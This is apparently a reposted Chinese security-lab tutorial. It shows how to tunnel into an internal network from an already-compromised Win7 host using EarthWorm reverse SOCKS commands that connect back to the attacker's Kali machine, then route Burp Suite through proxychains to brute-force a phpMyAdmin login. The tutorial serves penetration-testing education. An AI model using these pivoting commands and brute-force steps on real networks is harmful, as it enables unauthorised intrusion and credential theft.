内网穿透后抓包技巧

admin 2023年11月8日00:26:40评论22 views字数 1210阅读4分2秒阅读模式

文章源自【字节脉搏社区】-字节脉搏实验室

作者-purplet

扫描下方二维码进入社区

内网穿透后抓包技巧

提出问题:通过ew反向代理后利用proxychains打开了火狐,访问了内网web端口,然后登录处想抓包爆破应该怎么设置这个代理呢?如果ew流量从1080端口走,bp也设置了1080这样会报端口占用了,如何解决呢?

内网穿透后抓包技巧

一、实验环境

内网穿透后抓包技巧

二、实验工具

Earthworm:下载地址:http://rootkiter.com/EarthWorm/

内网穿透后抓包技巧

三、操作步骤

首先模拟提前拿下一台Win7靶机,实战环境可通过蚁剑进行上传EW工具,注意根据实际环境上传对应系统版本的EW文件,实验这里我就直接提前上传EW了。

内网穿透后抓包技巧

知识点:

正向代理即是客户端代理, 代理客户端, 服务端不知道实际发起请求的客户端。

反向代理即是服务端代理, 代理服务端, 客户端不知道实际提供服务的服务端。

一般当有防火墙过滤时,正向连接无法建立时,尝使用反向代理的方式将目标机器的流量代理出来,所以这里就用到了代理中的大杀器EW。

EW关于代理的部分知识也很简单,这里不对其所有的代理方法进行介绍,只对反向代理中用到的部分进行阐述。

Kali:./ew_for_linux64 -s rcsocks -l 1080 -e 8880

该命令是将本地1080端口的流量走向本地8880端口

Win7靶机:ew.exe -s rssocks -d 172.17.60.226 -e 8880

该命令是将Win7靶机的流量流向Kali(172.17.60.226)的8880端口,但是流量之间的信息是需要通过端口进行交互的,Win7上虽然没有开放端口,但也会有一个大端口与Kali的8880端口进行双向交互。

内网穿透后抓包技巧

内网穿透后抓包技巧

内网穿透后抓包技巧

EW连接上后再修改Proxychains的配置文件

(vi /etc/proxychains.conf)将dynamic_chain前的注释去掉,并在最后写上socks5 127.0.0.1 1080

内网穿透后抓包技巧

内网穿透后抓包技巧

这样所有使用proxychains代理链开启的工具流量都会从本地的1080走向Win7的某大端口,从而将流量成功带入到内网环境,再通过proxychains firefox开启火狐访问内网win7的web端口发现存在phpmyadmin。

内网穿透后抓包技巧

内网穿透后抓包技巧

实验以phpmyadmin的密码爆破抓包为例,实战以任意web页面都可。首先不使用proxychains开启火狐,正常开启,正常配置bp端口进行抓包即可。

内网穿透后抓包技巧

内网穿透后抓包技巧

然后修改BurpSuite的User option选项将SOCKS Proxy中的代理修改为127.0.0.1 1080(与Proxychains中的配置相同)再进行抓包就可以对内网的web页面密码进行爆破了

内网穿透后抓包技巧

内网穿透后抓包技巧

内网穿透后抓包技巧

通知!

公众号招募文章投稿小伙伴啦!只要你有技术有想法要分享给更多的朋友,就可以参与到我们的投稿计划当中哦~感兴趣的朋友公众号首页菜单栏点击【商务合作-我要投稿】即可。期待大家的参与~

内网穿透后抓包技巧

记得扫码

关注我们

原文始发于微信公众号(字节脉搏实验室):内网穿透后抓包技巧

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月8日00:26:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网穿透后抓包技巧https://cn-sec.com/archives/1987588.html

发表评论

匿名网友 填写信息